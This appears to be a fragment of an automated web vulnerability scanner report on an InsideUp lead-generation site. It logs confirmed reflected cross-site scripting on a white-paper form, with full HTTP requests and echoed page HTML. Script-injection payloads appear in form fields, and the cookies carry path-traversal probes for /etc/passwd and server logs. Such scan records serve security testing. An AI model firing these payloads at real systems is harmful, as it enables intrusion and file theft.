>Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="'"--></style></script><script>netsparker(0x0003F5)</script>"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>&nbsp;</td>..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x000439)</script>
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 225
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company=3&companyServices=3&email=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000439)%3c%2fscript%3e&iusrc=3&lastName=Smith&parentPage=3&phone=3&src=aboutUs&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:20:43 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=4F607FB0A2B29A85F6626116F503E161; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('White Paper Form',0,'')" alt="" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerAdvertiseActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerAdvertiseActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <div class="clear"></div> <div class="grid_5 aboutUs" style="margin-left:13px;margin-top:20px;"><a class="secondaryAction" style="margin-left:0;text-decoration: none;"><strong>About InsideUp</strong></a> | <a href="management.html" class="secondaryAction">Management</a> | <a href="pressRelease.html" class="secondaryAction">News Releases</a> | <a href="careers.html" class="secondaryAction">Careers</a> | <a href="contactUs.html" class="secondaryAction">Contact Us</a></div>
<div class="grid_5 aboutUs" style="margin-left:13px;margin-top:25px;"><span>Use InsideUp to Acquire New Business Service Customers</span></div>
<div class="clear"></div>
<div class="grid_1 aboutUs" style="margin-left:13px;margin-top:25px;">
<p>Founded by performance-based marketing, online advertising and lead generation experts, InsideUp operates an online lead generation platform that's dedicated solely to serving the needs of business service providers and their potential customers. InsideUp's online media network, dynamic business-matching lead generation system and leading-edge marketing practices provide business service firms with ready-to-buy qualified and verified sales leads, all delivered in real time.</p>
<p>InsideUp's platform also helps companies who are seeking business services to locate the right service provider for their specific needs. Companies seeking business services use InsideUp's online platform to access helpful vendor selection tools and content plus pricing and feature comparisons from several service vendors. Companies receive competitive bids from only pre-screened, high-quality vendors who meet their specific business needs.</p>
<p>This is all made possible by InsideUp's unique, proprietary platform, which combines next generation business-matching and prospect-profiling technologies with powerful search engine, social media and lead generation technologies.</p>
<p style="margin-bottom:15px;">Clearly most business service providers need a cost-effective and qualified pipeline of fresh sales prospects who are actively interested in what they sell. These providers are keenly interested in all sales prospects who can be converted into long-term, satisfied customers. InsideUp puts these business service providers into direct contact with prospects who are actively in the marketplace to purchase the type of services they provide.</p>
<img src="/images/party-links.jpg" alt="Links" border="0" usemap="#Map">
<map name="Map">
<area shape="rect" coords="2,1,184,64" href="https://twitter.com/VendorSourcing" target="_blank">
<area shape="rect" coords="198,1,379,63" href="http://www.youtube.com/insideupvendors" target="_blank">
<area shape="rect" coords="390,1,575,60" href="http://insideup.com/blogs/b2bsourcing" target="_blank">
</map> </div>
<div class="grid_4">
<div class="aboutUsForm" >
<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="aboutUs"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="'"--></style></script><script>netsparker(0x000439)</script>"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>&am..
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST 3
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST '"--></style></script><script>alert(0x00045F)</script>
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 